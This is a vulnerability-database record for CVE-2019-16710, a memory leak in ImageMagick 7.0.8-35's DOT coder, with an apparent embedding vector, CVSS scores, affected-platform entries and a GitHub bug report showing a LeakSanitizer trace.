-0.006089338101446629, -0.0063646044582128525, 0.010913939215242863, 0.031603552401065826, -0.009187944233417511, 0.0018143400084227324, -0.019119851291179657, -0.0056838784366846085, -0.013621964491903782, -0.003451988799497485, -0.0021649326663464308, 0.011576065793633461, -0.016382068395614624, -0.0005821511149406433, -0.016322551295161247, 0.007502867840230465, -0.014983417466282845, 0.009366495534777641, -0.006654750090092421, -0.002871697535738349, -0.007502867840230465, 0.001444218447431922, -0.014224574901163578, -0.015429794788360596, 0.016277913004159927, -0.023330682888627052, -0.016292791813611984, 0.005356534384191036, -0.00046520945033989847, 0.0034761675633490086, -0.012982156127691269, 0.010393165051937103, -0.001447938266210258, -0.0075698248110711575, -0.0014869963051751256, -0.007967844605445862, -0.0018961760215461254, -0.012878001667559147, 0.005189142655581236, 0.022824788466095924, 0.004824600648134947, -0.013837713748216629, -0.02663387916982174, -0.012848243117332458, -0.006145135499536991, -0.0020105603616684675, 0.020354831591248512, 0.002246768679469824, -0.020429227501153946, -0.0010554976761341095, -0.006810982245951891, -0.003024209989234805, 0.004389382433146238, -0.009344176389276981, -0.00009956319263437763, 0.00087880645878613, -0.006755185313522816, -0.008890359662473202, 0.02208082564175129, -0.014403126202523708, -0.004701846744865179, -0.006357165053486824, 0.0014497981173917651, -0.03050248697400093, 0.019878694787621498, 0.006145135499536991, 0.00008177782001439482, -0.01329462043941021, 0.001301005482673645, 0.007677699439227581, -0.00858533475548029, 0.01007326040416956, 0.016054723411798477, -0.017006997019052505, 0.0014814165187999606, -0.009165626019239426, -0.00926234107464552, -0.01164302323013544, 0.039489563554525375, 0.0212178286164999, 0.003226940054446459, 0.004095517098903656, 0.002319304971024394, 0.008220792748034, 0.00993190798908472, 0.009344176389276981, 0.00016262568533420563, 0.00801992230117321, 0.008421662263572216, 0.005668999161571264, 0.009619442746043205, -0.005345374811440706, -0.02356875129044056, -0.013986506499350071, 0.00001466130470362259, 0.013242543675005436, 0.0046683684922754765, -0.013413654640316963, 0.014715590514242649, 0.026619000360369682, 0.0050961473025381565, -0.018167579546570778, -0.003042809199541807, -0.008429101668298244, 0.005274698603898287, 0.03496626764535904, -0.006654750090092421, 0.01761704683303833, 0.0018599077593535185, -0.007201563101261854, -0.016679653897881508, 0.009336736984550953, -0.010727948509156704, -0.026708275079727173, -0.01336157787591219, 0.004925035871565342, 0.014760227873921394, 0.016917720437049866, 0.023509234189987183, -0.032823652029037476, -0.0016348588978871703, -0.0026410690043121576, 0.0029088957235217094, -0.014001386240124702, -0.007923207245767117, 0.0007318737334571779, -0.006156294606626034, 0.01079490501433611, -0.023226529359817505, -0.0184354055672884, -0.01538515742868185, 0.002049618400633335, 0.004262908827513456, 0.004991992376744747, -0.005877308547496796, 0.0025685327127575874, 0.007205282803624868, -0.01301935501396656, -0.006829581223428249, -0.01617375761270523, -0.004653489217162132, -0.00018959435692522675, 0.002726624719798565, 0.032466549426317215, -0.025264987722039223, -0.015221484936773777, -0.01365172304213047, 0.015169408172369003, -0.005646680016070604, -0.025175711140036583, -0.010013743303716183, -0.025622090324759483, -0.007428471930325031, -0.003909526392817497, 0.02157493121922016, -0.002661528065800667, -0.004579092841595411, 0.0034891869872808456, -0.004612571094185114, -0.006524556316435337, -0.012178676202893257, -0.002895876532420516, -0.014879262074828148, 0.009545046836137772, 0.008927557617425919, -0.03463892266154289, -0.008109197951853275, -0.03785284236073494, 0.0062269712798297405, -0.009165626019239426, -0.03943004459142685, -0.003314355621114373, -0.009656641632318497, 0.02090536430478096, -0.01079490501433611, -0.019298402592539787, -0.02194691263139248, 0.023241408169269562, -0.01380795519798994, 0.018093183636665344, 0.012878001667559147, -0.013108629733324051, -0.008510937914252281, -0.015251243487000465, -0.019447196274995804, -0.014752788469195366, -0.01739385724067688, -0.022780150175094604, 0.0027210451662540436, 0.0015558128943666816, 0.003803511383011937, 0.0034594284370541573, 0.027005860581994057, 0.010735387913882732, -0.00924002192914486, 0.011590945534408092, 0.01852468214929104, -0.01229771040380001, -0.003995081875473261, 0.008131517097353935, -0.010289009660482407, -0.004679528065025806, -0.0018254994647577405, -0.015310760587453842, -0.015281002037227154, 0.007235041353851557, -0.013324378989636898, -0.0008360285428352654, -0.022467685863375664, -0.008414222858846188, -0.008548135869204998, -0.016768928617239, -0.012171236798167229, 0.005311896558851004, 0.00775953521952033, 0.022155221551656723, -0.001820849720388651, 0.0061748940497636795, -0.011092490516602993, 0.006651030387729406, 0.006721706595271826, 0.0020682173781096935, 0.00418107258155942, -0.015176847577095032, 0.01522892527282238, -0.008905238471925259, -0.01757240854203701, -0.029892437160015106, 0.008637411519885063, 0.0014377087354660034, 0.004977113101631403, 0.0043298653326928616, 0.00745823048055172, -0.00023225598852150142, 0.01365172304213047, -0.005163103807717562, 0.03130596876144409, -0.018762750551104546, -0.016099361702799797, -0.005497887264937162, -0.0034147906117141247, 0.026648757979273796, -0.0029014560859650373, -0.004612571094185114, 0.002179811941459775, -0.00007433818973368034, -0.017989028245210648, 0.008012482896447182, -0.00035733479307964444, 0.019090093672275543, -0.003158123465254903, -0.014380807057023048, -0.008049680851399899, -0.02068217471241951, 0.027184411883354187, 0.00941857323050499, 0.013443413190543652, -0.013398775830864906, -0.004396821837872267, 0.002458798000589013, -0.010244372300803661, -0.0032659980934113264, -0.00939625408500433, 0.025339383631944656, -0.013934428803622723, -0.005345374811440706, -0.004240589682012796, 0.019715022295713425, 0.012260512448847294, 0.0047948420979082584, -0.0006249290308915079, 0.009321858175098896, 0.004835760220885277, 0.024699576199054718, 0.03362713381648064, -0.005795472767204046, 0.02208082564175129, 0.02654460445046425, -0.029758524149656296, -0.0037774727679789066, -0.02334556169807911, 0.005843830294907093, 0.02112855203449726, 0.0008178944699466228, -0.008577894419431686, 0.00008520702249370515, -0.0015995206777006388, 0.009842632338404655, 0.008771325461566448, -0.0002538774278946221, -0.0019324441673234105, -0.029267508536577225, 0.008414222858846188, 0.00892011821269989, -0.010177415795624256, 0.012825923971831799, -0.012714330106973648, 0.0017222745809704065, -0.004378222860395908, 0.010809783823788166, -0.0009164695511572063, -0.008429101668298244, -0.010155096650123596, 0.02117319032549858, -0.02563696913421154, 0.007647940889000893, -0.030621521174907684, 0.022378411144018173, -0.00014484031999018043, -0.02303309738636017, -0.0034650082234293222, -0.006323686335235834, -0.011032973416149616, 0.032645102590322495, -0.017631925642490387, 0.0014851363375782967, -0.006450160406529903, -0.008243110962212086, 0.01058659516274929, 0.0029851519502699375, -0.003520805388689041, -0.0025778322014957666, -0.0034612882882356644, 0.01022949256002903, -0.0027136055286973715, -0.01806342415511608, -0.025309626013040543, 0.029356785118579865, 0.0020886764395982027, -0.009388814680278301, -0.007662820164114237, -0.015355398878455162, -0.02347947657108307, 0.004218271002173424, 0.003226940054446459, -0.044816337525844574, -0.0011373335728421807, 0.0017036754870787263, -0.008116637356579304, -0.009619442746043205, 0.011873651295900345, -0.01955134980380535, -0.008771325461566448, 0.02374730259180069, -0.004147594328969717, 0.0028679778333753347, -0.0062902080826461315, -0.009641761891543865, 0.016411826014518738, 0.005538805387914181, -0.00351522583514452, 0.01211915910243988, 0.025205470621585846, -0.0036398395895957947, -0.000016114358004415408, -0.006513397209346294, -0.002062637824565172, -0.007900888100266457, 0.027541514486074448, 0.031603552401065826, -0.0002062172716250643, -0.012572976760566235, -0.01009557954967022, -0.010690749622881413, -0.00011926658771699294, 0.00021156451839488, -0.018137820065021515, 0.009299539029598236, -0.009693839587271214, 0.002603870816528797, -0.012401864863932133, 0.009686400182545185, -0.0009736617212183774, 0.0029702726751565933, 0.004047159571200609, -0.02199154905974865, 0.011866211891174316, -0.007655380293726921, 0.028761614114046097, 0.015065252780914307, -0.03085958957672119, 0.018628835678100586, -0.024163922294974327, 0.030829831957817078, 0.007856250740587711, 0.002737784292548895, -0.022556962445378304, 0.007625621743500233, -0.004802281968295574, -0.01022949256002903, 0.010355966165661812, -0.003104186151176691, 0.005639240611344576, -0.0012526479549705982, 0.002754523418843746, 0.012074521742761135, 0.009991425089538097, 0.004575373139232397, 0.02194691263139248, -0.0073057180270552635, 0.014648634009063244, 0.012654813006520271, -0.0038128108717501163, 0.014730469323694706, -0.010318768210709095, -0.006837021093815565, 0.009247461333870888, -0.012572976760566235, -0.03213920816779137, 0.020384589210152626, -0.01502805482596159, -0.009589684195816517, 0.0028493786230683327, 0.006513397209346294, 0.018420526757836342, -0.0015381437260657549, -0.02172372303903103, 0.006572914309799671, 0.020384589210152626, 0.022765271365642548, 0.004638609942048788, 0.02527986653149128, 0.006680788937956095, 0.008734126575291157, 0.0005361184012144804, -0.002814040519297123, -0.019134731963276863, -0.0034036312717944384, -0.00520402193069458, 0.008957316167652607, 0.009306978434324265, -0.011233842931687832, 0.002801021095365286, 0.008071999996900558, 0.004634890239685774, -0.013889791443943977, -0.00607073912397027, -0.019268644973635674, -0.010370845906436443, -0.01144215278327465, 0.008109197951853275, 0.005427211057394743, -0.023047978058457375, -0.014618875458836555, 0.007833931595087051, -0.006989533547312021, 0.007915767841041088, -0.0002034274220932275, -0.008815962821245193, -0.019075214862823486, 0.0001332159008597955, 0.008458860218524933, -0.005337935406714678, -0.001096415682695806, -0.012290270999073982, 0.005687598139047623, 0.023181891068816185, -0.0003357133537065238, 0.007402433082461357, 0.0007713967352174222, -0.004772523418068886, 0.002313725184649229, 0.008682049810886383, -0.01468583196401596, -0.005933105945587158, -0.0016571778105571866, 0.011330557987093925, 0.003358993446454406, -0.039816904813051224, -0.0146635128185153, 0.003234379692003131, -0.0012024303432554007, -0.009582244791090488, 0.003950444050133228, 0.022824788466095924, 0.030383452773094177, 0.04410213232040405, -0.005501607432961464, -0.00291075580753386, -0.009775674901902676, 0.019402557983994484, -0.0008555575623176992, -0.016441585496068, 0.01717066951096058, -0.01874786987900734, 0.002953533548861742, 0.0056094820611178875, 0.013302060775458813, -0.018122941255569458, 0.013041673228144646, -0.0008946156594902277, 0.006833301391452551, -0.01955134980380535, -0.007242480758577585, 0.004355904180556536, -0.0126622524112463, 0.01455191895365715, -0.00015820840781088918, -0.027333205565810204, -0.019357919692993164, -0.015667863190174103, -0.011613264679908752, -0.0037532940041273832, 0.015504191629588604, -0.008994514122605324, 0.0243275947868824, 0.004184792749583721, 0.013726119883358479, -0.027095137163996696, 0.007692578714340925, 0.00907635036855936, -0.02158981002867222, -0.03889439254999161, -0.011345437727868557, -0.016337430104613304, -0.004791122395545244, -0.013145828619599342, 0.023643147200345993, -0.007774414494633675, 0.018093183636665344, 0.005051509477198124, 0.007465669885277748, 0.005639240611344576, -0.00539373280480504, -0.0009220492793247104, -0.009723598137497902, -0.018584199249744415, -0.015370277687907219, 0.00451585603877902, -0.025919675827026367, -0.004162473604083061, -0.00858533475548029, 0.025607209652662277, 0.014232014305889606, 0.011687660589814186, -0.018777629360556602, -0.013235104270279408, -0.009850071743130684, -0.015965448692440987, -0.0029293547850102186, 0.015325640328228474, -0.005561124067753553, 0.014425444416701794, -0.012067081406712532, -0.003961603622883558, -0.010713068768382072, 0.006230690982192755, -0.004430300556123257, -0.0014935059007257223, 0.009969105944037437, -0.013681481592357159, 0.0037365546450018883, 0.009835192002356052, -0.004344744607806206, 0.010006303898990154, 0.01022949256002903, -0.0014953658683225513, -0.003442689310759306, -0.05213693529367447, 0.00231558526866138, 0.015489311888813972, 0.005282138008624315, -0.010497319512069225, -0.0031079058535397053, -0.03437109664082527, 0.015281002037227154, 0.006137695629149675, -0.02568160742521286, -0.010080699808895588, -0.008830842562019825, 0.0005226340726949275, -0.03157379478216171, -0.005326775833964348, 0.005304457154124975, 0.02816644310951233, 0.0034036312717944384, -0.026663638651371002, 0.018033666536211967, 0.004307546652853489, -0.0010378285078331828, -0.0092177027836442, -0.03059176355600357, 0.02050362341105938, 0.011032973416149616, 0.013309500180184841, -0.012059642001986504, 0.008391903713345528, -0.024759093299508095, 0.02303309738636017, -0.009902149438858032, 0.008295188657939434, 0.0005133345257490873, -0.01139751449227333, 0.008927557617425919, -0.01078746560961008, 0.002330464543774724, -0.002520174952223897, 0.005576003342866898, -0.008429101668298244, -0.006052140146493912, 0.0019994007889181376, 0.014470082707703114, 0.024030009284615517, -0.0010517778573557734, 0.006398082710802555, -0.007662820164114237, -0.006067019421607256, 0.023509234189987183, 0.0037588735576719046, 0.00589218782261014, -0.021158311516046524, -0.01968526467680931, -0.012863121926784515, -0.005769433919340372, 0.0007128096767701209, -0.01595056988298893, 0.0001511175069026649, 0.000022812932002125308, 0.004006241448223591, 0.012223313562572002, -0.0011298939352855086, -0.00869692862033844, -0.007945526391267776, 0.019476953893899918, -0.012424184009432793, -0.006751465145498514, -0.0019287243485450745, -0.0025145953986793756, 0.009924467653036118, -0.019610866904258728, -0.019402557983994484, -0.0037793326191604137, 0.0011568625923246145, 0.0032641382422298193, -0.007339196279644966, -0.019610866904258728, -0.015533950179815292, -0.0184354055672884, -0.0013809815282002091, 0.0064166816882789135, 0.0038537289947271347, 0.01617375761270523, 0.007439631037414074, 0.01263993326574564, 0.023732423782348633, -0.009983984753489494, 0.00028224100242368877, 0.010266691446304321, 0.004564213566482067, -0.0005486728041432798, 0.0029349345713853836, -0.011717419140040874, -0.011516548693180084, 0.004333585035055876, 0.0005212391843087971, 0.014336169697344303, 0.008005043491721153, -0.007283398881554604, -0.000028596083211596124, 0.00450469646602869, -0.002739644143730402, 0.000808129960205406, 0.011501669883728027, 0.012989596463739872, 0.02279502898454666, -0.0038388497196137905, 0.022051066160202026, 0.006483638659119606, 0.012967277318239212, 0.0020719373133033514, -0.005468128714710474, -0.012394425459206104, -0.013964187353849411, 0.0022337492555379868, 0.005218901205807924, 0.009143306873738766, -0.006409242283552885, 0.0012768267188221216, 0.007856250740587711, 0.012431623414158821, -0.009701278991997242, 0.008228232152760029, -0.004177352879196405, 0.0007286188774742186, 0.016664773225784302, -0.004757644142955542, 0.005970303900539875, 0.020473865792155266, 0.014046023599803448, 0.010355966165661812, -0.0033645732328295708, 0.0053602540865540504, 0.007662820164114237, 0.007938086055219173, -0.0399954579770565, -0.02721417136490345, -0.02199154905974865, -0.003511505899950862, -0.015667863190174103, -0.002814040519297123, 0.004846919793635607, -0.012870562262833118, 0.0005193792749196291, -0.008280309848487377, -0.013421094976365566, -0.008339826948940754, 0.02428295649588108, 0.01417249720543623, 0.0027061658911406994, 0.010720508173108101, 0.021693965420126915, -0.032287999987602234, 0.02297358028590679, -0.014135299250483513, 0.025041798129677773, 0.0126622524112463, -0.02419367991387844, -0.007833931595087051, 0.001168952090665698, -0.014232014305889606, -0.03234751522541046, -0.0002741039206739515, -0.0006928156362846494, 0.012327468954026699, 0.017066514119505882, 0.020161399617791176, 0.01040804386138916, 0.017765838652849197, -0.01435104850679636, 0.007811612915247679, 0.006264169234782457, 0.010690749622881413, 0.004806001670658588, 0.007722337264567614, -0.009626883082091808, 0.000993190798908472, 0.006558035034686327, -0.00941857323050499, 0.0031339447014033794, 0.019209127873182297, 0.007000693120062351, 0.00869692862033844, -0.019938211888074875, 0.0010136497439816594, -0.015801776200532913, 0.016917720437049866, 0.0007923207012936473, -0.012476261705160141, -0.034668680280447006, -0.0026113104540854692, 0.028092047199606895, 0.003522665472701192, -0.015057813376188278, -0.024759093299508095, 0.024803729727864265, -0.0042777881026268005, 0.012193555943667889, -0.002750803716480732, -0.017274823039770126, 0.006446440238505602, -0.009961666539311409, -0.013956747949123383, 0.0034278100356459618, 0.008801084011793137, 0.013748438097536564, 0.00105084793176502, 0.0243275947868824, 0.020622657611966133, 0.0007318737334571779, -0.010475000366568565, 0.0008690418908372521, 0.025473296642303467, -0.020473865792155266, -0.013874911703169346, -0.010616353712975979, -0.008332386612892151, 0.0011643022298812866, 0.014209695160388947, 0.017869994044303894, 0.02297358028590679, 0.005497887264937162, -0.004936195444315672, 0.017899753525853157, -0.005996342748403549, -0.008272869512438774, 0.0024197399616241455, 0.023687785491347313, 0.01507269311696291, 0.0028382192831486464, -0.005077548325061798, -0.009976545348763466, -0.011821573600172997, 0.014737909659743309, 0.00989470910280943, -0.013465732336044312, 0.017631925642490387, 0.02721417136490345, -0.002062637824565172, 0.025354262441396713, 0.00817615445703268, -0.03145476058125496, 0.0095524862408638, 0.023940732702612877, 0.010088140144944191, 0.014886702410876751, 0.00858533475548029, -0.007249920628964901, -0.0008392833988182247, 0.01403114479035139, 0.005140785127878189, 0.0029126156587153673, 0.0005305386730469763, -0.01165046263486147, -0.015057813376188278, 0.018450284376740456, -0.012290270999073982, 0.020771449431777, 0.009098668582737446, 0.00837702490389347, -0.008600213564932346, -0.013837713748216629, 0.0019287243485450745, 0.022199859842658043, -0.0017762118950486183, -0.00874156691133976, -0.015786897391080856, 0.005936825647950172, -0.014760227873921394, -0.028374753892421722, 0.013086311519145966, 0.005624361336231232, -0.0007076949113979936, -0.007487988565117121, -0.00856301560997963, 0.007819052785634995, 0.006346005480736494, -0.007160644978284836, 0.0011280340841040015, -0.007205282803624868, 0.009254900738596916, -0.005430930759757757, 0.014797426760196686, 0.01250602025538683, -0.016233274713158607, -0.0027749824803322554, 0.01681356690824032, -0.0013642424019053578, 0.00874156691133976, 0.0015902211889624596, 0.008027361705899239, -0.011032973416149616, 0.0019380239536985755, -0.0344306118786335, 0.0015437235124409199, -0.005092427600175142, -0.010601473972201347, -0.00836214516311884, -0.026976102963089943, -0.01653086021542549, 0.016917720437049866, 0.001190340961329639, 0.012669691815972328, -0.02108391560614109, -0.0030521086882799864, -0.004489817190915346, -0.00033245852682739496, 0.0010536377085372806, -0.01369636133313179, -0.0037663131952285767, 0.006825861521065235, -0.009745917282998562, 0.0028995962347835302, 0.012937518768012524, 0.01901569776237011, 0.010519638657569885, 0.012334908358752728, -0.0012907759519293904, 0.03359737619757652, -0.020265555009245872, -0.02888064831495285, 0.019804298877716064, -0.00903171207755804, 0.009686400182545185, -0.0076851388439536095, 0.0022802469320595264, 0.004411701112985611, 0.02483348920941353, 0.006394363008439541, 0.010065820999443531, -0.006297647953033447, -0.010326207615435123, -0.0048952773213386536, 0.007089968305081129, -0.02257184125483036, -0.006431560963392258, -0.015742259100079536, 0.010601473972201347, 0.0036119408905506134, -0.017557529732584953, 0.0068035428412258625, -0.006837021093815565, 0.022809909656643867, 0.0039058064576238394, -0.004835760220885277, 0.018554439768195152, 0.011814134195446968, -0.004579092841595411, -0.00804224144667387, -0.015236364677548409, -0.008503498509526253, -0.015920810401439667, 0.009173065423965454, -0.019834056496620178, -0.011278481222689152, -0.031425002962350845, -0.011814134195446968, 0.014946218580007553, 0.004195951856672764, -0.014455202966928482, 0.012081961147487164, 0.004169913474470377, -0.011918289586901665, 0.015697622671723366, -0.0015660423086956143, 0.01401626504957676, 0.00892011821269989, -0.014410565607249737, 0.018420526757836342, 0.00907635036855936, 0.014291531406342983, 0.011047852225601673, -0.015489311888813972, 0.004024840425699949, -0.01621839590370655, -0.011709979735314846, 0.00990958884358406, -0.005010591819882393, -0.008749006316065788, 0.004378222860395908, -0.018212217837572098, -0.009321858175098896, 0.01313838828355074, 0.011486790142953396, 0.003998801577836275, 0.011776936240494251, -0.013421094976365566, 0.0005677368608303368, 0.008302628062665462, 0.0034687279257923365, 0.004560493864119053, -0.0014888561563566327, -0.013934428803622723, 0.010690749622881413, -0.004054598975926638, -0.008808523416519165, -0.0002529474732000381, 0.04969673603773117, 0.030398333445191383, 0.014812305569648743, 0.014901581220328808, -0.012476261705160141, -0.012878001667559147, -0.024357352405786514, -0.00204403861425817, 0.008942436426877975, 0.005003151949495077, -0.0022318894043564796, 0.004564213566482067, 0.006788663566112518, 0.006874219048768282, -0.009195384569466114, -0.000046323330025188625, 0.0022653676569461823, -0.00261317053809762, -0.000727688951883465, -0.007766975089907646, -0.03204993158578873, 0.007893448695540428, 0.011040412820875645, -0.015065252780914307, 0.004285227507352829, -0.0017259943997487426, 0.0023546433076262474, -0.016887962818145752, 0.009827752597630024, -0.0022318894043564796, 0.029029440134763718, -0.004385662730783224, 0.0026485086418688297, 0.005345374811440706, 0.024491265416145325, 0.010489880107343197, 0.015355398878455162, 0.008927557617425919, 0.010980895720422268, -0.0011894110357388854, 0.01385259348899126, -0.005029190797358751, -0.012468822300434113, -0.019253766164183617, 0.0022597878705710173, -0.020607778802514076, -0.00819847360253334, -0.017691442742943764, 0.009232582524418831, 0.015414915978908539, 0.004523295909166336, 0.017111152410507202, -0.013778196647763252, 0.008034802041947842, -0.009745917282998562, 0.014142738655209541, 0.0014535179361701012, 0.005151944700628519, -0.013205345720052719, 0.017111152410507202, -0.0078860092908144, 0.0001155467689386569, -0.009760796092450619, -0.012900320813059807, -0.015965448692440987, 0.007179243955761194, -0.0012712469324469566, 0.015035494230687618, -0.006989533547312021, 0.03027929924428463, 0.019343040883541107, -0.003850009059533477, -0.016069604083895683, -0.005259819328784943, -0.015920810401439667, -0.01313838828355074, 0.014812305569648743, 0.003169282805174589, 0.01563810557126999, -0.007960405200719833, 0.008086878806352615, -0.005241220351308584, 0.006044700276106596, -0.003712375881150365, 0.0022653676569461823, -0.009872390888631344, -0.030889349058270454, -0.017021875828504562, -0.017721202224493027, 0.008116637356579304, -0.0007383833872154355, 0.026871947571635246, -0.016441585496068, -0.013740998692810535, 0.014246894046664238, -0.011166886426508427, -0.014403126202523708, -0.005564844235777855, 0.0033701530192047358, 0.0012275391491129994, 0.01725994423031807, 0.0070044128224253654, -0.013592205941677094, 0.00023399964265991002, 0.007112287450581789, 0.004047159571200609, 0.009969105944037437, 0.0020068404264748096, -0.018599078059196472, 0.01060891430824995, -0.002944234060123563, 0.00941857323050499, -0.010199734009802341, 0.009120987728238106, 0.02446150779724121, 0.004363343585282564, -0.004917596001178026, -0.003935564775019884, -0.003654718864709139, 0.0017604026943445206, -0.013800515793263912, -0.011918289586901665, 0.031246451660990715, 0.00450469646602869, 0.008726687170565128, -0.017869994044303894, -0.013666602782905102, 0.016635015606880188, 0.009046591818332672, 0.013733559288084507, -0.009180504828691483, -0.01500573568046093, 0.019134731963276863, 0.01761704683303833, -0.00419223215430975, 0.01178437564522028, -0.008280309848487377, 0.01950671337544918, 0.007923207245767117, -0.011799255385994911, 0.0007899958291091025, 0.038269463926553726, -0.0012005704920738935, -0.009143306873738766, -0.002650368493050337, 0.027734944596886635, -0.013220224529504776, -0.0031488239765167236, -0.021277345716953278, -0.011814134195446968, 0.004307546652853489, 0.02816644310951233, 0.01027413085103035, -0.008466300554573536, -0.0017380837816745043, 0.0001685541501501575, 0.0068035428412258625, 0.009106108918786049, -0.012721769511699677, -0.0009355336078442633, -0.0031990413554012775, 0.001088976045139134, 0.00522634107619524, -0.0009104248601943254, -0.002668967703357339, 0.010155096650123596, 0.0020235797856003046, 0.00119964056648314, 0.012758967466652393, 0.004199672024697065, -0.0047762431204319, 0.0006979304016567767, -0.013681481592357159, 0.006989533547312021, 0.008957316167652607, 0.023777062073349953, 0.010028623044490814, -0.01883714646100998, 0.01284080371260643, 0.015266123227775097, 0.0368708111345768, -0.010497319512069225, -0.010341087356209755, 0.012431623414158821, 0.03889439254999161, -0.009158185683190823, 0.006773784290999174, -0.004947354551404715, 0.014886702410876751, 0.007171804551035166, 0.003303196281194687, -0.01996796950697899, 0.02761591039597988, -0.008815962821245193, -0.0008606723276898265, 0.017096271738409996, 0.007900888100266457, 0.011070171371102333, 0.025845278054475784, -0.0031488239765167236, 0.009247461333870888, -0.021247586235404015, -0.01725994423031807, 0.010594034567475319 ]
3,037
CVE-2019-16710
2019-09-23T12:15:10.580000
ImageMagick 7.0.8-35 has a memory leak in coders/dot.c, as demonstrated by AcquireMagickMemory in MagickCore/memory.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00040.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-11/msg00042.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1528" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-35:*:*:*:*:*:*:*", "matchCriteriaId": "5D3D09FA-AD5C-4BE2-BDF5-746DD70AA733", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*", "matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/1528
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description memory leaks in AcquireMagickMemory ``` ================================================================= ==54549==ERROR: LeakSanitizer: detected memory leaks Direct leak of 13504 byte(s) in 1 object(s) allocated from: #0 0x7f1d5e55d602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x43f173 in AcquireMagickMemory MagickCore/memory.c:478 #2 0x412e4f in AcquireCriticalMemory MagickCore/memory-private.h:64 #3 0x4131c2 in AcquireImage MagickCore/image.c:171 #4 0x58026c in ReadDOTImage coders/dot.c:129 #5 0x805aeb in ReadImage MagickCore/constitute.c:547 #6 0x807c95 in ReadImages MagickCore/constitute.c:917 #7 0xad7412 in CompositeImageCommand MagickWand/composite.c:534 #8 0xc9c5ea in MagickCommandGenesis MagickWand/mogrify.c:184 #9 0x40e941 in MagickMain utilities/magick.c:149 #10 0x40eb22 in main utilities/magick.c:180 #11 0x7f1d5a84d82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) ``` ### Steps to Reproduce ./magick composite input1 input2 output.aai ### System Configuration 1、Linux ubuntu 4.15.0-42-generic #45~16.04.1-Ubuntu SMP Mon Nov 19 13:02:27 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux 2、./configure 